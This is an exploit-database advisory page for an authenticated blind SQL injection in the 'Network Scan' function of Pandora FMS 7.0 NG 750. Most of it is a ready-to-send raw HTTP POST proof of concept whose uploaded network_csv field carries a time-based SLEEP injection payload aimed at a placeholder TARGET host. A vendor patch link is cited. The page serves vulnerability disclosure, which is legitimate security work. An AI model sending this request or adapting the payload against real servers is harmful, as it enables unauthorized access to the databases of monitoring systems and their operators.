Pandora FMS 7.0 NG 750 SQL Injection

2020.12.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) # Date: 12-21-2020 # Exploit Author: Matthew Aberegg, Alex Prieto # Vendor Homepage: https://pandorafms.com/ # Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c # Software Link: https://pandorafms.com/community/get-started/ # Version: Pandora FMS 7.0 NG 750 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS. # Vulnerable Parameter : network_csv # POC POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119 Content-Length: 1597 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_manual_defined" 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_select" 300 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_text" 0 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval" 0 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="interval_units" 1 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="taskname" test -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="id_recon_server" 3 -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network_csv_enabled" on -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network_csv"; filename="test.txt" Content-Type: text/plain ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="network" -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="comment" test -----------------------------308827614039434535382911921119 Content-Disposition: form-data; name="submit" Next -----------------------------308827614039434535382911921119--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top